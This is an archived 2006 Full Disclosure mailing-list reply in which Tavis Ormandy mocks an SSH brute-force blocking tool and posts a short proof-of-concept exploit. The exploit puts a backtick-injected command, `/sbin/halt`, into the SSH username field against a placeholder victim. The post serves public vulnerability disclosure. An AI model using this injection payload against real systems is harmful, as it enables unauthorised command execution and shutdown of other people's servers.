Full Disclosure mailing list archives

Re: SSH brute force blocking tool

From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 20:34:33 +0000

On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
For those interested, I wrote a program called Sharpener which is an SSH
brute force blocking tool that also reports back the offenders'
addresses. I have begun posting the information on the attackers as well
as sending out messages (whenever possible) to the admins of these
domains. Think of it as an RBL for SSH attackers. The goal is to
identify these machines in order for others to implement safeguards
(ACL's) against these hosts. Feel free to comment/complain.

http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)

Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim